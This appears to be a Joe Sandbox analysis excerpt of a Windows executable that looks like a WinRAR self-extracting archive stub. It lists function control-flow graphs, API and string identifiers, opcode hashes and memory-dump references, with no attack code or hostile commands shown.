                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                                                          • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                          • API String ID: 3007431893-3916287355
                                                                                          • Opcode ID: b7154b3062765e774fb4d3900928860f85d38d3e5f0f1e416892871c0c5aef40
                                                                                          • Instruction ID: a0e54ce5bc7876fe41af78271d202d36abfd899f2ddc01775ff8544197d04935
                                                                                          • Opcode Fuzzy Hash: b7154b3062765e774fb4d3900928860f85d38d3e5f0f1e416892871c0c5aef40
                                                                                          • Instruction Fuzzy Hash: 4613AA62B1DB8289FB10DF64D8802FC27A1EB45798F801536DA5D97BE9DF38E584E340
                                                                                          Function 00007FF6373C0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1466 7ff6373c0754-7ff6373c0829 call 7ff6373adfd0 call 7ff6373a62dc call 7ff6373b946c call 7ff6373c3cf0 call 7ff6373b9a14 1477 7ff6373c0860-7ff6373c0883 1466->1477 1478 7ff6373c082b-7ff6373c0840 1466->1478 1481 7ff6373c0885-7ff6373c089a 1477->1481 1482 7ff6373c08ba-7ff6373c08dd 1477->1482 1479 7ff6373c0842-7ff6373c0855 1478->1479 1480 7ff6373c085b call 7ff6373c220c 1478->1480 1479->1480 1485 7ff6373c0ddd-7ff6373c0de2 call 7ff6373c7904 1479->1485 1480->1477 1487 7ff6373c08b5 call 7ff6373c220c 1481->1487 1488 7ff6373c089c-7ff6373c08af 1481->1488 1483 7ff6373c08df-7ff6373c08f4 1482->1483 1484 7ff6373c0914-7ff6373c0937 1482->1484 1490 7ff6373c090f call 7ff6373c220c 1483->1490 1491 7ff6373c08f6-7ff6373c0909 1483->1491 1492 7ff6373c096e-7ff6373c097a GetCommandLineW 1484->1492 1493 7ff6373c0939-7ff6373c094e 1484->1493 1503 7ff6373c0de3-7ff6373c0e2f call 7ff6373c7904 call 7ff6373c1900 1485->1503 1487->1482 1488->1485 1488->1487 1490->1484 1491->1485 1491->1490 1499 7ff6373c0980-7ff6373c09b7 call 7ff6373c797c call 7ff63739129c call 7ff6373bcad0 1492->1499 1500 7ff6373c0b47-7ff6373c0b5e call 7ff6373a6454 1492->1500 1496 7ff6373c0950-7ff6373c0963 1493->1496 1497 7ff6373c0969 call 7ff6373c220c 1493->1497 1496->1485 1496->1497 1497->1492 1525 7ff6373c09b9-7ff6373c09cc 1499->1525 1526 7ff6373c09ec-7ff6373c09f3 1499->1526 1509 7ff6373c0b60-7ff6373c0b85 call 7ff637391fa0 call 7ff6373c3640 1500->1509 1510 7ff6373c0b89-7ff6373c0ce4 call 7ff637391fa0 SetEnvironmentVariableW GetLocalTime call 7ff6373a3e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff6373bb014 call 7ff6373a98ac call 7ff6373b67b4 * 2 DialogBoxParamW call 7ff6373b68a8 * 2 1500->1510 1520 7ff6373c0e34-7ff6373c0e6a 1503->1520 1509->1510 1572 7ff6373c0ce6 Sleep 1510->1572 1573 7ff6373c0cec-7ff6373c0cf3 1510->1573 1524 7ff6373c0e6c 1520->1524 1524->1524 1530 7ff6373c09ce-7ff6373c09e1 1525->1530 1531 7ff6373c09e7 call 7ff6373c220c 1525->1531 1532 7ff6373c09f9-7ff6373c0a13 OpenFileMappingW 1526->1532 1533 7ff6373c0adb-7ff6373c0b12 call 7ff6373c797c call 7ff63739129c call 7ff6373bfd0c 1526->1533 1530->1503 1530->1531 1531->1526 1537 7ff6373c0ad0-7ff6373c0ad9 CloseHandle 1532->1537 1538 7ff6373c0a19-7ff6373c0a39 MapViewOfFile 1532->1538 1533->1500 1556 7ff6373c0b14-7ff6373c0b27 1533->1556 1537->1500 1538->1537 1541 7ff6373c0a3f-7ff6373c0a6f UnmapViewOfFile MapViewOfFile 1538->1541 1541->1537 1544 7ff6373c0a71-7ff6373c0aca call 7ff6373ba190 call 7ff6373bfd0c call 7ff6373ab9b4 call 7ff6373abb00 call 7ff6373abb70 UnmapViewOfFile 1541->1544 1544->1537 1557 7ff6373c0b42 call 7ff6373c220c 1556->1557 1558 7ff6373c0b29-7ff6373c0b3c 1556->1558 1557->1500 1558->1557 1561 7ff6373c0dd7-7ff6373c0ddc call 7ff6373c7904 1558->1561 1561->1485 1572->1573 1575 7ff6373c0cf5 call 7ff6373b9f4c 1573->1575 1576 7ff6373c0cfa-7ff6373c0d1d call 7ff6373ab8e0 DeleteObject 1573->1576 1575->1576 1580 7ff6373c0d1f DeleteObject 1576->1580 1581 7ff6373c0d25-7ff6373c0d2c 1576->1581 1580->1581 1582 7ff6373c0d2e-7ff6373c0d35 1581->1582 1583 7ff6373c0d48-7ff6373c0d59 1581->1583 1582->1583 1584 7ff6373c0d37-7ff6373c0d43 call 7ff63739ba0c 1582->1584 1585 7ff6373c0d6d-7ff6373c0d7a 1583->1585 1586 7ff6373c0d5b-7ff6373c0d67 call 7ff6373bfe24 CloseHandle 1583->1586 1584->1583 1589 7ff6373c0d9f-7ff6373c0da4 call 7ff6373b94e4 1585->1589 1590 7ff6373c0d7c-7ff6373c0d89 1585->1590 1586->1585 1596 7ff6373c0da9-7ff6373c0dd6 call 7ff6373c2320 1589->1596 1593 7ff6373c0d99-7ff6373c0d9b 1590->1593 1594 7ff6373c0d8b-7ff6373c0d93 1590->1594 1593->1589 1595 7ff6373c0d9d 1593->1595 1594->1589 1597 7ff6373c0d95-7ff6373c0d97 1594->1597 1595->1589 1597->1589
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                          • API String ID: 1048086575-3710569615
                                                                                          • Opcode ID: cf171760da93c4691ee509495d3afa31e70d11824e8d8503b99fa0ba8bf4b656
                                                                                          • Instruction ID: dd18b5b79ff7c8ba889f92ca9459f3cd1c7197e3859afd7c94216244cfe80b38
                                                                                          • Opcode Fuzzy Hash: cf171760da93c4691ee509495d3afa31e70d11824e8d8503b99fa0ba8bf4b656
                                                                                          • Instruction Fuzzy Hash: 97128162E1CB9781FB10DB29EC452B963A1FF85794F404235DA9D86BA9EF3CE540E700
                                                                                          Function 00007FF6373AA4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                          • String ID: $%s:$CAPTION
                                                                                          • API String ID: 2100155373-404845831
                                                                                          • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                          • Instruction ID: 93cfb53d639618d584f73977775f4db7847571f20297691b5ebcd97fa5184830
                                                                                          • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                          • Instruction Fuzzy Hash: D4910833B1C69686FB58DF29E84166AA7A1FB84784F405535EE4D87B98DF3CE805CB00
                                                                                          Function 00007FF6373B8624 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                          • String ID: PNG
                                                                                          • API String ID: 211097158-364855578
                                                                                          • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                          • Instruction ID: 1bbedd00655d974d1a471523223354929cd4d8e782a2b4acba2a7221bf846640
                                                                                          • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                          • Instruction Fuzzy Hash: EB410525A1DB0782FE149B66E8553B963A0EF88BD4F084435DE0D873A4EF7CF489A740
                                                                                          Function 00007FF63739F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID: __tmp_reference_source_
                                                                                          • API String ID: 3668304517-685763994
                                                                                          • Opcode ID: 546bfbb3834a8236b0052fbcde26bfd38d0cff33b633d9866d52bcd982655d44
                                                                                          • Instruction ID: 96a4689c75e6b57659fb4c183846ea488c7b7ed9389a915e96efd43a9c75ebbc
                                                                                          • Opcode Fuzzy Hash: 546bfbb3834a8236b0052fbcde26bfd38d0cff33b633d9866d52bcd982655d44
                                                                                          • Instruction Fuzzy Hash: ACE29E62A0C6C692FEA4CB25E1413EEA7A1FB91784F404132DB9D93BA5DF3CE455E700
                                                                                          Function 00007FF637394840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3668304517-2756464174
                                                                                          • Opcode ID: c62cb8c225dacd0c10275fc1d9f1c3032114a95c1d7526bbbd9358fcb1e26ce4
                                                                                          • Instruction ID: 4b09151a8de3766c71c731ede856c79347f459cfb3b658c24bead1c6da0c5235
                                                                                          • Opcode Fuzzy Hash: c62cb8c225dacd0c10275fc1d9f1c3032114a95c1d7526bbbd9358fcb1e26ce4
                                                                                          • Instruction Fuzzy Hash: E3E2C962B0C68286FB689B65D4513FE67A1EF66388F400136DA5E877D6DF3CE494E300
                                                                                          Function 00007FF6373A40BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3767 7ff6373a40bc-7ff6373a40f3 3768 7ff6373a41d2-7ff6373a41df FindNextFileW 3767->3768 3769 7ff6373a40f9-7ff6373a4101 3767->3769 3772 7ff6373a41e1-7ff6373a41f1 GetLastError 3768->3772 3773 7ff6373a41f3-7ff6373a41f6 3768->3773 3770 7ff6373a4103 3769->3770 3771 7ff6373a4106-7ff6373a4118 FindFirstFileW 3769->3771 3770->3771 3771->3773 3774 7ff6373a411e-7ff6373a4146 call 7ff6373a6a0c 3771->3774 3775 7ff6373a41ca-7ff6373a41cd 3772->3775 3776 7ff6373a4211-7ff6373a4253 call 7ff6373c797c call 7ff63739129c call 7ff6373a8090 3773->3776 3777 7ff6373a41f8-7ff6373a4200 3773->3777 3787 7ff6373a4167-7ff6373a4170 3774->3787 3788 7ff6373a4148-7ff6373a4164 FindFirstFileW 3774->3788 3778 7ff6373a42eb-7ff6373a430e call 7ff6373c2320 3775->3778 3803 7ff6373a4255-7ff6373a426c 3776->3803 3804 7ff6373a428c-7ff6373a42e6 call 7ff6373af168 * 3 3776->3804 3780 7ff6373a4202 3777->3780 3781 7ff6373a4205-7ff6373a420c call 7ff6373920b0 3777->3781 3780->3781 3781->3776 3791 7ff6373a4172-7ff6373a4189 3787->3791 3792 7ff6373a41a9-7ff6373a41ad 3787->3792 3788->3787 3796 7ff6373a41a4 call 7ff6373c220c 3791->3796 3797 7ff6373a418b-7ff6373a419e 3791->3797 3792->3773 3794 7ff6373a41af-7ff6373a41be GetLastError 3792->3794 3798 7ff6373a41c0-7ff6373a41c6 3794->3798 3799 7ff6373a41c8 3794->3799 3796->3792 3797->3796 3801 7ff6373a4315-7ff6373a431b call 7ff6373c7904 3797->3801 3798->3775 3798->3799 3799->3775 3806 7ff6373a426e-7ff6373a4281 3803->3806 3807 7ff6373a4287 call 7ff6373c220c 3803->3807 3804->3778 3806->3807 3810 7ff6373a430f-7ff6373a4314 call 7ff6373c7904 3806->3810 3807->3804 3810->3801
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                          • String ID:
                                                                                          • API String ID: 474548282-0
                                                                                          • Opcode ID: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                                                                                          • Instruction ID: 20bfde60a2fdc9a2459ab3f3854af478bf4ff9f35889ba02e40c4b8fc20d3be7
                                                                                          • Opcode Fuzzy Hash: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                                                                                          • Instruction Fuzzy Hash: 1A61A062A0CA4681FE509B29E8452AD6361FF957A4F105331EABD83BE9DF3CE584D700
                                                                                          Function 00007FF637395E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CMT
                                                                                          • API String ID: 0-2756464174
                                                                                          • Opcode ID: bb8f32dfb39c41a2f4cffe25f113d86e3364d78267da2167cd0a984ef8db8d77
                                                                                          • Instruction ID: 43c930ff818a759b06bcf06ec46b290aa594c5abc01a437787bb4e87fddd3acc
                                                                                          • Opcode Fuzzy Hash: bb8f32dfb39c41a2f4cffe25f113d86e3364d78267da2167cd0a984ef8db8d77
                                                                                          • Instruction Fuzzy Hash: EB42BB62B0E6829AFB19DB74C1513FD67A1EB62748F400136DB5E93796DF38E528E300
                                                                                          Function 00007FF6373B1F20 Relevance: .3, Instructions: 337COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
                                                                                          • Instruction ID: 25b2ff8e4ec7089bb6bd12a0fdd4ff6edb37465a0bc81fe4d4d7aec5a16e75bc
                                                                                          • Opcode Fuzzy Hash: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
                                                                                          • Instruction Fuzzy Hash: C2E1D122A0DA828AFB64CF29A4442BD7B91FB49748F054139DB9EC7785DE3CF541D708
                                                                                          Function 00007FF6373B3484 Relevance: .3, Instructions: 302COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 342467450e98b7b75b466d1eafea627c07b1293b3fd099ee508e1bce11d9ebd7
                                                                                          • Instruction ID: 877400f0ba1e7ee962c99030e4f4571ccbf1e9cf607dc39d3ab206b3468d0d8a
                                                                                          • Opcode Fuzzy Hash: 342467450e98b7b75b466d1eafea627c07b1293b3fd099ee508e1bce11d9ebd7
                                                                                          • Instruction Fuzzy Hash: 20B1CFA2B08AE992EE58CB66D5087E9A391FB09BC4F448036DE4D8B741DF7CF155D302
                                                                                          Function 00007FF6373A4928 Relevance: .1, Instructions: 136COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                          • String ID:
                                                                                          • API String ID: 3340455307-0
                                                                                          • Opcode ID: fd8835e4233293591ea5a8582186aba0aa2126ac905c183a9a3c131a0123eb89
                                                                                          • Instruction ID: 645e52fac3e00c69cddef14d2c100b6ed37f35a3baf40f10a2565dcce8dfb8c6
                                                                                          • Opcode Fuzzy Hash: fd8835e4233293591ea5a8582186aba0aa2126ac905c183a9a3c131a0123eb89
                                                                                          • Instruction Fuzzy Hash: 73412722B1D69686FFA4DF29A94676A2252FBC4788F048034DE4D87795CE3CE442D704
                                                                                          Function 00007FF6373ADFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 7ff6373adfd0-7ff6373ae024 call 7ff6373c2450 GetModuleHandleW 3 7ff6373ae026-7ff6373ae039 GetProcAddress 0->3 4 7ff6373ae07b-7ff6373ae3a5 0->4 5 7ff6373ae053-7ff6373ae066 GetProcAddress 3->5 6 7ff6373ae03b-7ff6373ae04a 3->6 7 7ff6373ae503-7ff6373ae521 call 7ff6373a6454 call 7ff6373a7df4 4->7 8 7ff6373ae3ab-7ff6373ae3b4 call 7ff6373cb788 4->8 5->4 11 7ff6373ae068-7ff6373ae078 5->11 6->5 20 7ff6373ae525-7ff6373ae52f call 7ff6373a51a4 7->20 8->7 14 7ff6373ae3ba-7ff6373ae3fd call 7ff6373a6454 CreateFileW 8->14 11->4 21 7ff6373ae4f0-7ff6373ae4fe CloseHandle call 7ff637391fa0 14->21 22 7ff6373ae403-7ff6373ae416 SetFilePointer 14->22 27 7ff6373ae531-7ff6373ae53c call 7ff6373add88 20->27 28 7ff6373ae564-7ff6373ae5ac call 7ff6373c797c call 7ff63739129c call 7ff6373a8090 call 7ff637391fa0 call 7ff6373a32bc 20->28 21->7 22->21 24 7ff6373ae41c-7ff6373ae43e ReadFile 22->24 24->21 29 7ff6373ae444-7ff6373ae452 24->29 27->28 38 7ff6373ae53e-7ff6373ae562 CompareStringW 27->38 71 7ff6373ae5b1-7ff6373ae5b4 28->71 32 7ff6373ae800-7ff6373ae807 call 7ff6373c2624 29->32 33 7ff6373ae458-7ff6373ae4ac call 7ff6373c797c call 7ff63739129c 29->33 50 7ff6373ae4c3-7ff6373ae4d9 call 7ff6373ad0a0 33->50 38->28 42 7ff6373ae5bd-7ff6373ae5c6 38->42 42->20 45 7ff6373ae5cc 42->45 48 7ff6373ae5d1-7ff6373ae5d4 45->48 52 7ff6373ae63f-7ff6373ae642 48->52 53 7ff6373ae5d6-7ff6373ae5d9 48->53 60 7ff6373ae4ae-7ff6373ae4be call 7ff6373add88 50->60 61 7ff6373ae4db-7ff6373ae4eb call 7ff637391fa0 * 2 50->61 56 7ff6373ae7c2-7ff6373ae7ff call 7ff637391fa0 * 2 call 7ff6373c2320 52->56 57 7ff6373ae648-7ff6373ae65b call 7ff6373a7eb0 call 7ff6373a51a4 52->57 58 7ff6373ae5dd-7ff6373ae62d call 7ff6373c797c call 7ff63739129c call 7ff6373a8090 call 7ff637391fa0 call 7ff6373a32bc 53->58 82 7ff6373ae661-7ff6373ae701 call 7ff6373add88 * 2 call 7ff6373aaae0 call 7ff6373ada98 call 7ff6373aaae0 call 7ff6373adc2c call 7ff6373b87ac call 7ff6373919e0 57->82 83 7ff6373ae706-7ff6373ae753 call 7ff6373ada98 AllocConsole 57->83 106 7ff6373ae62f-7ff6373ae638 58->106 107 7ff6373ae63c 58->107 60->50 61->21 76 7ff6373ae5ce 71->76 77 7ff6373ae5b6 71->77 76->48 77->42 97 7ff6373ae7b4-7ff6373ae7bb call 7ff6373919e0 ExitProcess 82->97 94 7ff6373ae7b0 83->94 95 7ff6373ae755-7ff6373ae7aa GetCurrentProcessId AttachConsole call 7ff6373ae868 call 7ff6373ae858 